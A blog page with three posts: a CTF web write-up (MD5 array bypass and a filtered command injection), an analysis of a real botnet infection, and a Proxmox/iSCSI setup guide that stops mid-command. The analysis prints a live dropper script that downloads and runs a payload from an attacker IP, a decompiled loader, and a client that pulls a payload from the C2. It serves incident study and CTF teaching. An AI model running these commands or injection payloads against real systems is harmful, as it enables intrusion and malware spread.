PolarCTF 2025 Winter Competition Web Polarflag WriteUp
Opening the webpage, you can see it is a login page. Scanning with dirsearch yields:

Target: http://8c9e4bf8-68c2-4c3f-bf12-2b578912c971.game.polarctf.com:8090/

[15:15:01] Starting:
[15:15:04] 403 - 319B - /.ht_wsr.txt
[15:15:04] 403 - 319B - /.htaccess.bak1
[15:15:04] 403 - 319B - /.htaccess.orig
[15:15:04] 403 - 319B - /.htaccess.sample
[15:15:04] 403 - 319B - /.htaccess.save
[15:15:04] 403 - 319B - /.htaccess_orig
[15:15:04] 403 - 319B - /.htaccess_extra
[15:15:04] 403 - 319B - /.htaccess_sc
[15:15:04] 403 - 319B - /.htaccessBAK
[15:15:04] 403 - 319B - /.htaccessOLD
[15:15:04] 403 - 319B - /.htaccessOLD2
[15:15:04] 403 - 319B - /.htm
[15:15:04] 403 - 319B - /.html
[15:15:04] 403 - 319B - /.htpasswd_test
[15:15:04] 403 - 319B - /.htpasswds
[15:15:04] 403 - 319B - /.httr-oauth
[15:15:19] 200 - 448B - /flag.txt
[15:15:20] 200 - 3KB - /index.php
[15:15:20] 200 - 3KB - /index.php/login/
[15:15:28] 403 - 319B - /server-status/
[15:15:28] 403 - 319B - /server-status
Task Completed

The scan discovers /flag.txt; accessing it returns:

<?php
$original = "flag{polar_flag_in_here}";
$ascii_codes = [117, 115, 101, 114, 110, 97, 109, 101];
$new = "";
foreach ($ascii_codes as $code) {
    $new .= chr($code);
}
function replaceString($original, $new) {
    $temp = str_replace("flag{", "the_", $original);
    $temp = str_replace("polar_flag_in_here}", $new . "_is_polar", $temp);
    return $temp;
}
$result = replaceString($orginal, $ne1w);
echo "flag{polar_flag_in_here}";
?>

Running it as-is only prints the literal string flag{polar_flag_in_here}: the last two lines reference the misspelled (undefined) variables $orginal and $ne1w and then echo a hardcoded string. Correct them:

...
    return $temp;
}
-$result = replaceString($orginal, $ne1w);
+$result = replaceString($original, $new);
-echo "flag{polar_flag_in_here}";
+echo $result;

Running the corrected script yields the_username_is_polar, hinting that the username is polar. Meanwhile, the challenge attachment provides a dictionary, wordlist.txt.
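As a sanity check, the corrected transformation can be reproduced outside PHP; a minimal Python sketch of the same logic (variable names are mine):

# Mirror the corrected flag.txt logic to confirm the hint.
original = "flag{polar_flag_in_here}"
ascii_codes = [117, 115, 101, 114, 110, 97, 109, 101]
new = "".join(chr(c) for c in ascii_codes)  # -> "username"

result = original.replace("flag{", "the_")
result = result.replace("polar_flag_in_here}", new + "_is_polar")
print(result)  # the_username_is_polar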
Attempt brute-forcing with BurpSuite: Brute-forcing reveals that when the password is 6666, it redirects to /polar.php: Access /polar.php, obtain: <?php error_reporting(0); session_start(); if(isset($_GET['logout'])){ session_destroy(); header('Location: index.php'); exit(); } // Initialize session variable if(!isset($_SESSION['collision_passed'])) { $_SESSION['collision_passed'] = false; } // The one who wants to win has no smile on their face if(isset($_POST['a']) && isset($_POST['b'])) { if($_POST['a'] != $_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo "MD5 Well done \n"; $_SESSION['collision_passed'] = true; } else { echo "MD5 Not good enough\n"; $_SESSION['collision_passed'] = false; } } if(isset($_GET["polar"])){ if($_SESSION['collision_passed']) { if(preg_match('/et|echo|cat|tac|base|sh|tar|more|less|tail|nl|fl|vi|head|env|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["polar"])){ echo "gun gun !"; } else { echo "polar polar !"; system($_GET["polar"]); } } else { echo "Go back, this part isn't needed\n"; } } else { show_source(__FILE__); echo '<br><br><a href="?logout=1" style="color: #4CAF50; text-decoration: none; font-weight: bold;">Go home</a>'; } ?> First, bypass the MD5 check by passing a[]=1&b[]=2: POST /polar.php HTTP/1.1 Host: 350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 11 a[]=1&b[]=2 The server returns: Set-Cookie: PHPSESSID=443dctaboep4kh53upn3v2pqal; path=/ And prompts MD5 Well done, successfully bypassing. Since I used BurpSuite to send the request, I plan to use a regular browser next, so I write this cookie into the browser. Then directly access /polar.php?polar= to pass commands, no need to bypass MD5 again. Observing the regex filtering rules, many characters are blocked, including a series of symbols. First, try exporting environment variables with export, and discover a Flag: flag{7b93dd56-4f33-4738-b916-464a984093b3}, but submitting it shows it's incorrect. Asking customer service confirms this Flag is wrong. Since spaces are filtered, use $IFS$1 or %09 (Tab) to bypass. Also, because / is blocked, use ${PWD:0:1} (extract the first character of the PWD environment variable, which is /) instead. Construct the request: http://350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090/polar.php?polar=ls%09${PWD:0:1} Obtain: polar polar !bin dev etc home lib media mnt opt polarflag proc root run sbin srv sys tmp usr var Discover the Flag file: /polarflag. Since fl is filtered, cannot directly call the filename, so use ????????? to match a 9-character file. Commands like cat, tail, more, less that can print content are disabled, but commands like sort can still be used and also print content: http://350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090/polar.php?polar=sort%09${PWD:0:1}????????? Obtain the Flag: flag{polarctf1314inwebgame}
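For reference, the same chain (MD5 array bypass in one session, then the filtered command injection) can also be driven from a short script instead of BurpSuite plus a browser. A rough sketch using the requests library, with the instance URL taken from the challenge above:

import requests

BASE = "http://350eddd0-fd57-4dd0-94d3-c0c8888afd7d.game.polarctf.com:8090"
s = requests.Session()  # keeps PHPSESSID across requests

# 1. MD5 "collision": arrays make md5() return NULL on both sides.
r = s.post(f"{BASE}/polar.php", data={"a[]": "1", "b[]": "2"})
print(r.text)  # expect "MD5 Well done"

# 2. Command injection: tab (%09) instead of space, ${PWD:0:1} instead of "/".
for cmd in ("ls\t${PWD:0:1}", "sort\t${PWD:0:1}?????????"):
    r = s.get(f"{BASE}/polar.php", params={"polar": cmd})
    print(r.text)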
07/12/2025
62 Views
0 Comments
1 Star
The Reverse Engineering Journey: Analyzing a Server Compromise via RCE from CVE-2025-66478 and CVE-2025-55182
Background It was Saturday evening, and I was resting when Alibaba Cloud suddenly called, saying the server might have been hacked by intruders. I logged into the Alibaba Cloud console to check: What I had been worrying about finally happened. The recently disclosed CVE-2025-55182 vulnerability is exploitable for RCE (Remote Code Execution). The Umami analytics tool running on my server used a vulnerable version of Next.JS. Earlier in the morning, I had manually updated my Umami, but it seems the official patch had not been released yet. The server alert originated from the umami container, which executed a remote shell script. As a CTFer, it's hard to resist analyzing a sample delivered right to your doorstep, right? Analysis The Script The warning from Alibaba Cloud showed the execution of a shell script: /bin/sh -c wget https://sup001.oss-cn-hongkong.aliyuncs.com/123/python1.sh && chmod 777 python1.sh && ./python1.sh I tried to manually download that python1.sh: export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp cd /tmp touch /usr/local/bin/writeablex >/dev/null 2>&1 && cd /usr/local/bin/ touch /usr/libexec/writeablex >/dev/null 2>&1 && cd /usr/libexec/ touch /usr/bin/writeablex >/dev/null 2>&1 && cd /usr/bin/ rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex export PATH=$PATH:$(pwd) l64="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=l64&stage=true" l32="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=l32&stage=true" a64="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=a64&stage=true" a32="119.45.243.154:8443/?h=119.45.243.154&p=8443&t=tcp&a=a32&stage=true" v="042d0094tcp" rm -rf $v ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL -m180 $l64 -o $v||wget -T180 -q $l64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l64'", "'$v'")') elif [ ${ARCH}x = "i386x" ]; then (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")') elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")') elif [ ${ARCH}x = "aarch64x" ]; then (curl -fsSL -m180 $a64 -o $v||wget -T180 -q $a64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "'$v'")') elif [ ${ARCH}x = "armv7lx" ]; then (curl -fsSL -m180 $a32 -o $v||wget -T180 -q $a32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "'$v'")') fi chmod +x $v (nohup $(pwd)/$v > /dev/null 2>&1 &) || (nohup ./$v > /dev/null 2>&1 &) || (nohup /usr/bin/$v > /dev/null 2>&1 &) || (nohup /usr/libexec/$v > /dev/null 2>&1 &) || (nohup /usr/local/bin/$v > /dev/null 2>&1 &) || (nohup /tmp/$v > /dev/null 2>&1 &) # I found that it downloads the corresponding ELF file based on the CPU architecture. 
The Loader I attempted to manually download the binary for the amd64 architecture specified in the script above and opened it with IDA Pro: int __fastcall main(int argc, const char **argv, const char **envp) { struct hostent *v3; // rax in_addr_t v4; // eax int v5; // eax int v6; // ebx int v7; // r12d int v8; // edx _BYTE *v9; // rax __int64 v10; // rcx _DWORD *v11; // rdi _BYTE buf[2]; // [rsp+2h] [rbp-1476h] BYREF int optval; // [rsp+4h] [rbp-1474h] BYREF char *argva[2]; // [rsp+8h] [rbp-1470h] BYREF sockaddr addr; // [rsp+1Ch] [rbp-145Ch] BYREF char name[33]; // [rsp+2Fh] [rbp-1449h] BYREF char resolved[1024]; // [rsp+50h] [rbp-1428h] BYREF _BYTE v19[4136]; // [rsp+450h] [rbp-1028h] BYREF if ( !access("/tmp/log_de.log", 0) ) exit(0); qmemcpy(name, "119.45.243.154", sizeof(name)); *(_QWORD *)&addr.sa_family = 4213178370LL; *(_QWORD *)&addr.sa_data[6] = 0LL; v3 = gethostbyname(name); if ( v3 ) v4 = **(_DWORD **)v3->h_addr_list; else v4 = inet_addr(name); *(_DWORD *)&addr.sa_data[2] = v4; v5 = socket(2, 1, 0); v6 = v5; if ( v5 >= 0 ) { optval = 10; setsockopt(v5, 6, 7, &optval, 4u); while ( connect(v6, &addr, 0x10u) == -1 ) sleep(0xAu); send(v6, "l64 ", 6uLL, 0); buf[0] = addr.sa_data[0]; buf[1] = addr.sa_data[1]; send(v6, buf, 2uLL, 0); send(v6, name, 0x20uLL, 0); v7 = syscall(319LL, "a", 0LL); if ( v7 >= 0 ) { while ( 1 ) { v8 = recv(v6, v19, 0x1000uLL, 0); if ( v8 <= 0 ) break; v9 = v19; do *v9++ ^= 0x99u; while ( (int)((_DWORD)v9 - (unsigned int)v19) < v8 ); write(v7, v19, v8); } v10 = 1024LL; v11 = v19; while ( v10 ) { *v11++ = 0; --v10; } close(v6); realpath(*argv, resolved); setenv("CWD", resolved, 1); argva[0] = "[kworker/0:2]"; argva[1] = 0LL; fexecve(v7, argva, _bss_start); } } return 0; } Analysis revealed several key malicious operations: v7 = syscall(319LL, "a", 0LL);: 319 corresponds to the memfd_create system call on Linux x64, used to create an anonymous file in memory. Subsequently, it downloads a Payload from the target server and loads it into this memory region for execution. *v9++ ^= 0x99u;: Decrypts the downloaded Payload by XOR-ing each byte with 0x99, likely to evade firewall detection. argva[0] = "[kworker/0:2]";: Disguises the process as a kernel kworker process. Other operations: Checks for the existence of the log file /tmp/log_de.log to determine if the server has already been compromised. If so, it exits immediately. If connecting to the C2 server fails, it retries every 10 seconds to connect and load the Payload. The C2 server IP 119.45.243.154 is evident from the reversed code, but the port wasn't immediately obvious. Let's analyze the port setting code: *(_QWORD *)&addr.sa_family = 4213178370LL; Here, 4213178370LL (DEC) = 0xFB200002 (HEX). Since it's a QWORD (64-bit value), the actual value is 0x00000000FB200002. Due to little-endian byte order, the bytes stored in memory would be 02 00 20 FB 00 00 00 00. The typical memory layout for sockaddr is: offset 0–1: sa_family (2 bytes) offset 2–15: sa_data (14 bytes) Thus, the assignment above does the following: offset 0: Low byte of sa_family = 0x02 offset 1: High byte of sa_family = 0x00 offset 2: sa_data[0] = 0x20 offset 3: sa_data[1] = 0xFB offset 4..7: sa_data[2..5] = 0x00 0x00 0x00 0x00 Here, sa_data[0..1] represents the port, and sa_data[2..5] represents the IP address. Since network byte order is big-endian, the actual port is 0x20FB, which is 8443. 
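The byte-order reasoning is easy to verify mechanically; a small standalone Python check (no access to the sample required):

import struct

value = 4213178370  # the 64-bit constant written over sa_family/sa_data
raw = struct.pack("<Q", value)  # little-endian memory layout
print(raw.hex(" "))             # 02 00 20 fb 00 00 00 00

family = int.from_bytes(raw[0:2], "little")  # sockaddr.sa_family
port = int.from_bytes(raw[2:4], "big")       # port is in network byte order
print(family, port)                          # 2 (AF_INET), 8443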
The IP address assignment is found later: v3 = gethostbyname(name); if ( v3 ) v4 = **(_DWORD **)v3->h_addr_list; else v4 = inet_addr(name); *(_DWORD *)&addr.sa_data[2] = v4; I wrote a Python script to connect to the server based on the loader's logic and attempt to download the Payload into an ELF file: import socket import time import os C2_HOST = "119.45.243.154" C2_PORT = 8443 OUTPUT_FILE = "payload.elf" def xor_decode(data): return bytes([b ^ 0x99 for b in data]) def main(): # Delete old file if os.path.exists(OUTPUT_FILE): os.remove(OUTPUT_FILE) while True: try: print(f"[+] Connecting to C2 {C2_HOST}:{C2_PORT} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((C2_HOST, C2_PORT)) print("[+] Connected.") # Handshake s.send(b"l64 ") s.send(b"\x20\xfb") # fake port s.send(b"119.45.243.154".ljust(32, b"\x00")) print("[+] Handshake sent.") print(f"[+] Writing decrypted ELF data to {OUTPUT_FILE}\n") with open(OUTPUT_FILE, "ab") as f: while True: data = s.recv(4096) if not data: print("[-] C2 closed connection.") break decrypted = xor_decode(data) f.write(decrypted) print(f"[+] Received {len(data)} bytes, written to file.") print("[*] Reconnecting in 10 seconds...\n") time.sleep(10) except Exception as e: print(f"[-] Error: {e}") print("[*] Reconnecting in 10 seconds...\n") time.sleep(10) if __name__ == "__main__": main() Running it yielded an ELF file, payload.elf. Payload.elf First, I uploaded it to Weibu Cloud Sandbox for detection, which confirmed it was a Trojan: However, the sandbox didn't detect highly dangerous behaviors. I consulted a senior in reverse engineering, who analyzed the sample and determined it was written in Go. I used GoReSym to export the symbol table and loaded it into IDA Pro: \GoReSym.exe payload.elf > symbols.json I had an AI write an IDA Pro script to import the symbol table: import json import idc import idaapi import idautils # ⚠️ Modify this: Path to your generated symbols.json file json_path = r"D:\\Desktop\\symbols.json" def restore_symbols(): print("[-] Loading symbols from JSON...") try: with open(json_path, 'r', encoding='utf-8') as f: data = json.load(f) except Exception as e: print(f"[!] Error opening file: {e}") return # 1. Restore User Functions count = 0 for func in data.get('UserFunctions', []): start_addr = func['Start'] full_name = func['FullName'] # Clean up characters IDA doesn't like safe_name = full_name.replace("(", "_").replace(")", "_").replace("*", "ptr_").replace("/", "_") # Attempt to rename if idc.set_name(start_addr, safe_name, idc.SN_NOWARN | idc.SN_NOCHECK) == 1: # Optionally, if renaming succeeds, try to re-analyze as code idc.create_insn(start_addr) idc.add_func(start_addr) count += 1 print(f"[+] Successfully renamed {count} functions.") if __name__ == "__main__": restore_symbols() In IDA, I used File -> Script file to run the script and import the symbol table. Simultaneously, I provided the symbol table to an AI for analysis, which identified functions related to OSS bucket operations: (*Config).GetAccessKeyID / GetAccessKeySecret / GetSecurityToken -> Steals or uses cloud credentials. Bucket.PutObjectFromFile -> Uploads files (very likely exfiltrating data from your server to the attacker's OSS Bucket). Bucket.DoPutObject -> Executes the upload operation. (*Config).LimitUploadSpeed / LimitDownloadSpeed -> Limits bandwidth usage to avoid detection of abnormal network activity. 
Obfuscated Package Name | Real Package / Functional Guess | Evidence (Artifacts) | Behavior Description
ojQuzc_T | Aliyun OSS SDK | PutObjectFromFile, GetAccessKeySecret | Connects to Aliyun OSS, uploads/downloads files, steals credentials.
l2FdnE6 | os/exec (Command Execution) | (*Ps1Jpr8w8).Start, StdinPipe, Output | Executes system commands. It calls Linux shell commands.
qzjJr5PCHfoj | os / Filesystem Operations | Readdir, Chown, Truncate, SyscallConn | Traverses directories, modifies file permissions, reads/writes files.
PqV1YDIP | godbus/dbus (D-Bus) | (*Conn).BusObject, (*Conn).Eavesdrop | Connects to Linux D-Bus. Possibly for privilege escalation, monitoring system events, or interacting with systemd.
c376cVel0vv | math/rand | NormFloat64, Shuffle, Int63 | Generates random numbers. Often used for generating communication keys or randomness in mining algorithms.
r_zJbsaQ | net (Low-level Networking) | DialContext, Listen, Accept, SetKeepAlive | Establishes TCP/UDP connections, possibly for C2 communication or as a backdoor listening on a port.
J9ItGl7U | net/http2 | http2ErrCode, WriteHeaders, WriteData | Uses HTTP/2 protocol for communication (likely to hide C2 traffic).
Otkxde | ECC Cryptography Library | ScalarMult, Double, SetGenerator | Elliptic curve encryption. Possibly for encrypting C2 communication or as an encryption module for ransomware.

We can infer some possible program logic:

Persistence & Control (D-Bus & Net): It attempts to connect via D-Bus using the PqV1YDIP package, which is less common in server malware. It might be trying to hijack system services or monitor administrator activity. It listens on ports or establishes reverse connections via r_zJbsaQ.

Data Exfiltration (Aliyun OSS): It doesn't send data back to a typical C2 server IP but uses Aliyun OSS as a "transit point." This is a clever tactic because traffic to Aliyun is often considered whitelisted by firewalls and harder to detect.

Command Execution (os/exec): It has full shell execution capabilities (l2FdnE6), allowing it to execute arbitrary commands, download scripts, and modify file permissions.

Possible Ransomware or Cryptominer Features: Numerous mathematical operation libraries (Otkxde, HfBi9x4DOLl, etc., containing many Mul, Add, Square, Invert) suggest it is computationally intensive. If it's ransomware: these math libraries are used to generate keys for encrypting files. If it's a cryptocurrency miner: these libraries are used to calculate hashes. Combined with its use of Shuffle and NormFloat64 from math/rand, this aligns with features of some mining algorithms (like RandomX).

Further analysis led to a function named UXTgUQ_stlzy_RraJUM. I had an AI analyze it, and the conclusion was: this is a very typical C2 (Command & Control) instruction dispatcher function written in Golang. Combined with the context of the "Linux loader" mentioned earlier, this function belongs to the core Trojan (Bot) that was downloaded and executed by that loader.

1. Overview and Location
Function: Instruction Dispatcher (Command Dispatcher). This is part of the main loop logic of the Trojan, responsible for receiving command strings from the C2 server, parsing them, and executing corresponding malicious functions.
Security Mechanism: The function begins with an authentication check: if ( v18 == a2 && (unsigned __int8)sub_4035C0() ). If validation fails, it returns "401 Not Auth", indicating that this Trojan has some anti-scanning or session authentication mechanisms.

2.
Detailed Reverse Engineering of the Instruction Set The code uses switch ( a4 ) to determine the length of the command string and then checks its specific content. There are numerous hardcoded strings and Hex values here: Case 1 (Single-character commands - Basic Control) These are likely remnants of an early version or shorthand commands designed to reduce traffic: I: Calls os_rename. Function: Renames a file. E: Calls os_removeAll. Function: Deletes files/cleans traces. J: Returns "0" or unknown. Possibly used for heartbeat detection or status queries. Z: Returns "mysql_close\t1". Function: Database-related. It's inferred that this Trojan includes a MySQL brute-force or connection module, and this command closes the connection. H: Possibly gets host information (Host Info). Other single letters (A-Y): Call different sub-functions (like sub_7CAF40), typically corresponding to: enabling proxies, executing shell commands, obtaining system load, etc. Case 4 (Four-character commands) Hex: 1414092869 -> Little Endian: 0x54495845 -> "EXIT" Function: Terminates the Trojan process. Case 8 (Eight-character commands - Core Functions) This is the most critical part, exposing the Trojan's core capabilities: Download Hex: 0x64616F6C6E776F44LL -> "Download" Function: Downloader functionality. Downloads files from a specified URL. Code Logic: If a11 (callback function or interface) exists, it calls it to process the download result. LocalRun Hex: 0x6E75526C61636F4CLL -> "LocalRun" Function: Local execution. Likely executes a local shell script or binary file. Case 9 (Nine-character commands - Advanced Attacks) InjectRun Hex: 0x75527463656A6E49LL + 'n' -> "InjectRun" Function: Memory injection execution. This is an advanced feature, used in conjunction with memfd_create seen earlier. It typically refers to injecting a payload into another process or running it directly in memory without touching the disk. PluginRun Hex: 0x75526E6967756C50LL + 'n' -> "PluginRun" Function: Plugin execution. This indicates that the Trojan is modular and can dynamically load .so or Go plugin modules to extend functionality (such as cryptocurrency mining, DDoS attacks, port scanning, etc.). 3. Response Construction Logic After the switch block, there is a complex string concatenation logic: *(_WORD *)v71 = 15917 -> ASCII for | and }? Or specific delimiters. *(_BYTE *)(v80 + v79 + 2) = 45 -> ASCII for -. Conclusion: The Trojan wraps the command execution result (like "OK", "Error", or specific data) with specific delimiters (e.g., |<result>-) before sending it back to the C2. 4. Summary and Profile Combined with the previous code (the Loader), we can create a complete profile for this Trojan: Family Speculation: This naming style (InjectRun / PluginRun / LocalRun), combined with being written in Go and supporting modular plugins, strongly resembles the Spark botnet or a variant (like a modified version of the Sliver C2, but it's more akin to a custom-built blackhat bot). It could also be a variant of the Sysrv-hello mining worm (which often mixes Go and exploits). Attack Chain: Loader: The earlier C code, responsible for environment detection, persistence, and downloading the Bot in memory. Bot (this code): This Go program, resident in memory. Modules: Dynamically delivers mining modules (like XMRig) or DDoS attack modules via PluginRun. Lateral Movement: The mysql_close hint suggests it has password-scanning capabilities and infects other machines on the internal network via InjectRun. 
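The hex-to-string recovery used in the instruction-set analysis above is mechanical: each immediate is the command text stored little-endian. A quick Python helper (constants copied from the decompiled switch) confirms the names:

def qword_to_str(value, extra=""):
    # Decode a little-endian 64-bit immediate back into the ASCII it encodes.
    return value.to_bytes(8, "little").decode() + extra

print((1414092869).to_bytes(4, "little").decode())  # EXIT
print(qword_to_str(0x64616F6C6E776F44))             # Download
print(qword_to_str(0x6E75526C61636F4C))             # LocalRun
print(qword_to_str(0x75527463656A6E49, "n"))        # InjectRun
print(qword_to_str(0x75526E6967756C50, "n"))        # PluginRun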
Conclusion Honestly, I felt there wasn't much more meaningful analysis to be done. The logic essentially confirms it's a typical Botnet. The discovered IP has a 99% probability of being a compromised zombie machine, so investigating it seems pointless. The main takeaway is to summarize lessons learned on preventing such incidents. For small-scale personal websites like mine, when a CVE is disclosed, it's best to immediately disable all related services. Wait for a confirmed patched version to be released, then update and re-enable the services. Sample Download: Payload.zip Note: This sample is unprocessed. Do not run it directly without proper security measures! Password: 20251206
06/12/2025
131 Views
1 Comment
4 Stars
An Experience of Manually Installing Proxmox VE, Configuring Multipath iSCSI, and NAT Forwarding
The reason was that I rented a physical server, but the IDC did not provide Proxmox VE or Debian system images, only Ubuntu, CentOS, and Windows series. Additionally, the data disk was provided via multipath iSCSI. I wanted to use PVE for isolating different usage scenarios, so I attempted to reinstall the system and migrate the aforementioned configurations. Backup Configuration First, perform a general check of the system, which reveals: The system has two Network Interfaces: enp24s0f0 is connected to a public IP address for external access; enp24s0f1 is connected to the private network address 192.168.128.153. The data disk is mapped to /dev/mapper/mpatha. Under /etc/iscsi, there are configurations for two iSCSI Nodes: 192.168.128.250:3260 and 192.168.128.252:3260, both corresponding to the same target iqn.2024-12.com.ceph:iscsi. It can be inferred that the data disk is mounted by configuring two iSCSI Nodes and then merging them into a single device using multipath. Check the system's network configuration: network: version: 2 renderer: networkd ethernets: enp24s0f0: addresses: [211.154.[REDACTED]/24] routes: - to: default via: [REDACTED] match: macaddress: ac:1f:6b:0b:e2:d4 set-name: enp24s0f0 nameservers: addresses: - 114.114.114.114 - 8.8.8.8 enp24s0f1: addresses: - 192.168.128.153/17 match: macaddress: ac:1f:6b:0b:e2:d5 set-name: enp24s0f1 It's found to be very simple static routing. The internal network interface doesn't even have a default route; just binding the IP is sufficient. Then, save the iSCSI configuration files from /etc/iscsi, which include account and password information. Reinstall Debian Used the bin456789/reinstall script for this reinstallation. Download the script: curl -O https://cnb.cool/bin456789/reinstall/-/git/raw/main/reinstall.sh || wget -O ${_##*/} $_ Reinstall as Debian 13 (Trixie): bash reinstall.sh debian 13 Then, enter the password you want to set as prompted. If all goes well, wait about 10 minutes, and it will automatically complete and reinstall into a clean Debian 13. You can connect via SSH during the process using the set password to check the installation progress. After reinstalling, perform a source change and apt upgrade as usual to get a clean Debian 13. For changing sources, directly refer to the USTC Mirror Site tutorial. Install Proxmox VE This step mainly refers to the Proxmox official tutorial. Note: The Debian installed by the above script sets the hostname to localhost. If you want to change it, please modify it before configuring the Hostname and change the hostname in hosts to your modified hostname, not localhost. Configure Hostname Proxmox VE requires the current hostname to be resolvable to a non-loopback IP address: The hostname of your machine must be resolvable to an IP address. This IP address must not be a loopback one like 127.0.0.1 but one that you and other hosts can connect to. For example, my server IP is 211.154.[CENSORED], I need to add the following record in /etc/hosts: 127.0.0.1 localhost +211.154.[CENSORED] localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters After saving, use hostname --ip-address to check if it outputs the set non-loopback address: ::1 127.0.0.1 211.154.[CENSORED]. 
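If you would rather script this check than eyeball the hostname --ip-address output, here is a small Python sketch (run on the PVE host; purely illustrative) that flags the loopback-only case:

import socket

hostname = socket.gethostname()
# Addresses the hostname resolves to (via /etc/hosts or DNS).
addrs = socket.gethostbyname_ex(hostname)[2]
print(hostname, addrs)

if all(a.startswith("127.") for a in addrs):
    print("Only loopback addresses: the Proxmox VE installation will complain.")
else:
    print("Hostname resolves to a routable address, OK for Proxmox VE.")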
Add Proxmox VE Software Repository Debian 13 uses the Deb822 format (though you can use sources.list if you want), so just refer to the USTC Proxmox Mirror Site: cat > /etc/apt/sources.list.d/pve-no-subscription.sources <<EOF Types: deb URIs: https://mirrors.ustc.edu.cn/proxmox/debian/pve Suites: trixie Components: pve-no-subscription Signed-By: /usr/share/keyrings/proxmox-archive-keyring.gpg EOF Here, a keyring needs to be migrated but I couldn't find one after searching online, so I chose to pull a copy from an existing Proxmox VE server. It's available here: proxmox-keyrings.zip Extract the public key file and place it in /usr/share/keyrings/, then run: apt update apt upgrade -y This will sync the Proxmox VE software repository. Install Proxmox VE Kernel Use the following command to install the PVE kernel and reboot to apply the new kernel: apt install proxmox-default-kernel reboot Afterwards, uname -r should show a kernel version ending with pve, like 6.17.2-2-pve, indicating the new kernel is successfully applied. Install Proxmox VE Related Packages Use apt to install the corresponding packages: apt install proxmox-ve postfix open-iscsi chrony During configuration, you will need to set up the postfix mail server. Official explanation: If you have a mail server in your network, you should configure postfix as a satellite system. Your existing mail server will then be the relay host which will route the emails sent by Proxmox VE to their final recipient. If you don't know what to enter here, choose local only and leave the system name as is. After this, you should be able to access the Web console at https://<your server address>:8006. The account is root, and the password is your root password, i.e., the password configured during the Debian reinstallation. Remove Old Debian Kernel and os-prober Use the following commands: apt remove linux-image-amd64 'linux-image-6.1*' update-grub apt remove os-prober to remove the old Debian kernel, update grub, and remove os-prober. Removing os-prober is not mandatory, but it is recommended by the official guide because it might mistakenly identify VM boot files as multi-boot files, adding incorrect entries to the boot list. At this point, the installation of Proxmox VE is complete and ready for normal use! Configuring Internal Network Interface Because the iSCSI network interface and the public network interface are different, and the reinstallation lost this configuration, the internal network interface needs to be manually configured. Open the Proxmox VE Web interface, go to Datacenter - localhost (hostname) - Network, edit the internal network interface (e.g., ens6f1 here), enter the backed-up IPv4 in CIDR format: 192.168.128.153/17, and check Autostart, then save. Then use the command to set the interface state to UP: ip link set ens6f1 up Now you should be able to ping the internal iSCSI server's IP. Configure Data Disk iSCSI In the previous step, we should have installed the open-iscsi package required for iscsiadm. We just need to reset the nodes according to the backed-up configuration. First, discover the iSCSI storage: iscsiadm -m discovery -t st -p 192.168.128.250:3260 This should yield the two original LUN Targets: 192.168.128.250:3260,1 iqn.2024-12.com.ceph:iscsi 192.168.128.252:3260,2 iqn.2024-12.com.ceph:iscsi Transfer the backed-up configuration files to the server, overwriting the existing configuration in /etc/iscsi. 
Also, in my backed-up config, I found the authentication configuration: # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.250,3260,1/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.252,3260,2/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted Write these configurations to the new system using: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5 iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n 